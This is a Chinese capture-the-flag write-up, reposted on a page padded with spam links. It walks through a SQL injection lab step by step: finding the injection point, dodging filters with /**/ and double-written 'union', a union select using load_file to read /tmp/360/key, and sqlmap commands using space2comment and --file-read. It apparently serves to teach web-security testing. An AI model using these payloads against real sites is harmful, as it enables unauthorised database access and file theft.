当前位置: 首页 > news >正文

全景网站是怎么做的一个自己的网站

全景网站是怎么做的,一个自己的网站,哪些网站可以做edge主页,小程序开发需要什么基础url:http://192.168.154.253:81/ #打开http://XXX:81/,XXX为靶机的ip地址 审题 1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中 2、开始答题 发现这里url中有一个id的参数&#xff0…

url:http://192.168.154.253:81/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中

2、开始答题

发现这里url中有一个id的参数,并且给出了当前所执行的sql语句

第一步:判断注入点

1、?id=1'

2、?id=1'and'1'='1

第二步:判断语句模板

1、使用 order by 判断语句模板列数

发现语句在执行中过滤了空格还过滤了“#”

执行失败:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

执行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解释:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用来闭合前面的语句,order/**/by/**/3%23(order by 3)用来查询模板列数
  • /**/(用注释的方式代替空格),%23(使用url编码代替#

2、判断出语句模板有4个字段

回显正常:

?id=1')and'1'='1'order/**/by/**/4%23  #执行 order by 4 的时候回显正常

回显不正常:

?id=1')and'1'='1'order/**/by/**/5%23  #执行 order by 5 的时候回显不正常

第三步:找回显点

回显不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 报错找回显点

回显正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于过滤了union,所以这里使用双写的方式经行过滤绕过,并且判断出回显点有3个(语句模板中的234位置均为回显点)

第四步:拿到flag

执行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解释:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #当前数据库名
  • user() #当前数据库用户名
  • load_file('/tmp/360/key') #读取服务器文件

扩展:使用sqlmap一把梭哈

1、由于前面判断出了此题注入点存在过滤空格的情况,所以在使用sqlmap的时候需要指定脚本(用注释/**/替换空格字符' ':--tamper "space2comment.py")运行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  

2、获取到flag

http://www.hyszgw.com/news/23235.html

相关文章:

  • 做网站备案谁做推广app佣金平台正规
  • 网站会员和discuz会员同步全世界足球排名前十位
  • 哪里能找到网站龙岗百度快速排名
  • 网站模板 金融seo快速优化软件
  • 网站不备案支付宝接口今日热点事件
  • 公司请做网站哪些平台可以发广告
  • 郑州网站设计制作哪家好seo优化的技巧
  • 学校做网站一般多少钱山东关键词快速排名
  • 做视频网站带宽英文seo是什么
  • 上海 有哪些做网站的公司如何建立独立网站
  • wordpress验证登录无锡网站建设seo
  • 合肥专业做网站的公司热搜榜百度一下你就知道
  • wordpress调用网站标题网站策划书案例
  • 个人站长网站需要注册公司吗晋江怎么交换友情链接
  • wordpress 图片循环金融网站推广圳seo公司
  • 增城网站建设怎么选择怎么做私人网站
  • 专业商城网站建设公司杭州seo营销
  • 手机定制app系统优化
  • 网站如何做二级栏目seo优化博客
  • 金融投资网站模板seo公司
  • 网站机房建设解决方案怎样建立一个自己的网站
  • 游戏点卡平台网站开发重庆好的seo平台
  • 观澜小学 网站建设百度网站关键词排名查询
  • 广州做网站那家好深圳专业seo
  • 网站平台建设要多久球队积分排名
  • 可信网站网站认证河源今日头条新闻最新
  • 在线咨询网站模板品牌策划包括哪几个方面
  • 石家庄网站建设平台爱站网 关键词挖掘工具站
  • 功能网站开发武汉刚刚突然宣布
  • 二级菜单网站如何做伪静态查关键词